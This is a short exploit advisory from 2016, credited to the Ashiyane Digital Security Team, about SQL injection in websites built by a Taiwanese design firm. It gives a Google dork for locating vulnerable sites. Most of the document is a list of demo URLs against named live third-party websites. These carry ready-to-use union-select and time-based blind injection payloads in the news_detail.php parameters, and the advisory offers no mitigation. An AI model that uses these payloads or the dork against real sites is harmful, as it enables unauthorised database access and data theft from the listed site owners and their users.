###################### # Exploit Title : Design by 任意門網頁設計 SQL Injection # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://web999.com.tw/ # Google Dork : intext:"Design by 任意門網頁設計" news_detail.php? # Date: 27 01 2016 # Tested On : Win 10 / Google Chrome / Mozilla Firefox # ###################### # # demos : # http://www.firstek.com.tw/news_detail.php?new_no=-143+union+select+1,2,3,version(),5,6,7,8,9 # http://www.junyao-food.com/news_detail.php?new_no=-168+union+select+1,2,3,version(),5,6,7,8,9,10,11 # http://www.syd-medic.com/news_detail.php?new_no=-242+union+select+1,2,3,version(),5,6,7,8,9,10 # http://www.sanyi-rubber.com/news_detail.php?new_no=-131+union+select+1,2,3,version(),5,6,7,8,9 # http://www.hanchialang.com/news_detail.php?new_no=-54+union+select+1,2,3,version(),5,6,7,8,9,10,11 # http://www.web-zoom.net/news_detail.php?d=215%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=2 # http://www.sscbannko.com/news_detail.php?d=292%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=2 # http://www.yi-yang.tw/news_detail.php?d=101%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=3 # http://tajima.com.tw/news_detail.php?d=238%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=4 # http://shandongmanto.com/news_detail.php?d=434%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=5 # http://0800666337.com/news_detail.php?d=277%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=1 # http://cheng-cai168.com/news_detail.php?d=185%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=1 # http://united-school.com/news_detail.php?d=516%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=1 ###################### # discovered by : modiret ######################